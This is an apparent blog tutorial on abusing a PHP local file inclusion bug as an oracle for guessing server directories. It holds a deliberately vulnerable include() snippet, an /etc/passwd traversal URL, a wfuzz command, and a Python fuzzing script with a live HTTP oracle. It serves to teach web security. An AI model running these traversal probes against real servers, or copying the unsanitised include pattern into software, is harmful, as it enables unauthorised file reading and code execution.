Fuzzing Directories with LFI

LFI stands for Local File Inclusion. It lets an attacker make the application include, and thereby read (or, for PHP files, execute), other files on the web server.

In this post, I will try to take LFI exploitation a step further.
Because an LFI vulnerability lets us traverse into parent and child directories, we can abuse it as an oracle in a simple dictionary attack: a guessed path that includes successfully tells us that the directory exists.
This gives us a much better picture of the web server we are attacking.

A basic vulnerable PHP parameter looks like this. The value of the vuln GET parameter is passed straight to include(), so the user controls which file is loaded.

    if(isset($_GET["vuln"])){
        include($_GET["vuln"]);
    }

And a basic LFI attack looks like this.

    http://127.0.0.1/index.php?vuln=../../../etc/passwd

wfuzz

Wfuzz is a great tool with many features; it is something of a Swiss army knife. I am going to use it in this kind of scenario.

    $ wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
        "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php"

Let's say we are sure that somewhere on the server there is a PHP file named "file1.php".
We walk up the directory tree with "../" and let FUZZ stand in for the directory name we do not know, so every request asks the server whether ../<word>/file1.php exists.
The count of "../" and the count of fuzz markers both matter: we need one "../" for every level we go up, and one fuzz marker (FUZZ, then FUZ2Z, FUZ3Z and so on in wfuzz, each fed by its own -z payload) for every directory level whose name we still have to guess. Responses from a PHP include() usually differ between a hit and a miss only in length or content, so the misses have to be filtered out rather than relying on the HTTP status code.

After some iteration we end up with:

    http://127.0.0.1/index.php?vuln=../../../../../../var/www/secretsites/vulnerabilities/fi/file1.php

We have recovered the full path to file1.php.
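
The procedure above, worked through offline as an added example (this is not code from the original post). The target is a constructed in-memory filesystem, and the script assumes, as the page does not say, that include() resolves the parameter relative to the vulnerable script's directory (DOCROOT, assumed to be /var/www/html), that file1.php really lives at the path the post ends up with, and that a hit can be told from a miss by comparing the response with a deliberate miss. The function and wordlist names are mine; http_oracle is the only part that talks to a real target and is not exercised here.

```python
"""Directory discovery through an LFI oracle (added example, not from the post).

Assumptions not stated on the page: include() resolves a relative path against
DOCROOT; a miss can be recognised by comparing the response against a request
for a name that certainly does not exist; FAKE_FILES is a constructed layout
standing in for a real server.
"""
import itertools
import posixpath
import urllib.parse
import urllib.request

DOCROOT = "/var/www/html"          # assumed directory of index.php
KNOWN_FILE = "file1.php"           # the one file name we are sure exists
FAKE_FILES = {                     # constructed target filesystem
    "/var/www/html/index.php",
    "/var/www/secretsites/vulnerabilities/fi/file1.php",
    "/etc/passwd",
}
WORDLIST = ["admin", "secretsites", "vulnerabilities", "fi", "backup", "www", "var"]
MISS_NAME = "zz_no_such_dir_zz"    # a directory name that will never exist


def build_payload(ups, dirs, filename):
    """'../' repeated `ups` times, then the guessed directory segments, then the file."""
    return "../" * ups + "/".join(list(dirs) + [filename])


def fake_include(payload):
    """Offline stand-in for `include($_GET["vuln"])`.

    Returns the body a server would send: the file's content on a hit, a PHP
    style warning (which echoes the payload) on a miss. normpath clamps at '/',
    which is why surplus '../' segments do no harm in a real attack either.
    """
    resolved = posixpath.normpath(posixpath.join(DOCROOT, payload))
    if resolved in FAKE_FILES:
        return "<contents of %s>" % resolved
    return "Warning: include(%s): failed to open stream" % payload


def word_count(body):
    """Equivalent of wfuzz's word filter: stable even when the warning text
    echoes the guessed name back, unlike the raw character count."""
    return len(body.split())


def fuzz_level(oracle, ups, prefix, wordlist, filename, measure=word_count):
    """Try each word as the next directory segment after `prefix`; return the
    words whose response differs from a baseline request for MISS_NAME."""
    baseline = measure(oracle(build_payload(ups, prefix + [MISS_NAME], filename)))
    return [w for w in wordlist
            if measure(oracle(build_payload(ups, prefix + [w], filename))) != baseline]


def fuzz_path(oracle, ups, depth, wordlist, filename):
    """Guess `depth` directory segments at once, like FUZZ/FUZ2Z/FUZ3Z in wfuzz
    with one -z per marker. Costs len(wordlist) ** depth requests."""
    baseline = word_count(oracle(build_payload(ups, [MISS_NAME] * depth, filename)))
    hits = []
    for combo in itertools.product(wordlist, repeat=depth):
        if word_count(oracle(build_payload(ups, list(combo), filename))) != baseline:
            hits.append(combo)
    return hits


def http_oracle(base_url, param="vuln", timeout=10):
    """Oracle for a real target (assumed URL layout; not used offline): returns
    a callable mapping a payload to the response body, usable with fuzz_*."""
    def fetch(payload):
        url = base_url + "?" + urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


if __name__ == "__main__":
    # One level up, one guessed segment: nothing, because file1.php is deeper.
    print(fuzz_level(fake_include, 1, [], WORDLIST, KNOWN_FILE))
    # Same request, but comparing raw length: every word looks like a hit,
    # because the warning echoes the guessed name and changes length with it.
    print(fuzz_level(fake_include, 1, [], WORDLIST, KNOWN_FILE, measure=len))
    # Three segments at once from /var/www: finds the real path.
    print(fuzz_path(fake_include, 1, 3, WORDLIST, KNOWN_FILE))
```

The same discrimination in wfuzz is the --hw filter with the word count of a deliberate miss, which is more robust than hiding by character count (--hh) when PHP warnings echo the payload. Two caveats carry over to a real target: each extra fuzz marker multiplies the request count by the wordlist size, and every hit on a .php file executes that file on the server, so the fuzzing has side effects.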

This matters because the same web server may host other sites (subdomains or virtual hosts) under different document roots, and once their directories are known an attacker can include files from those sites as well.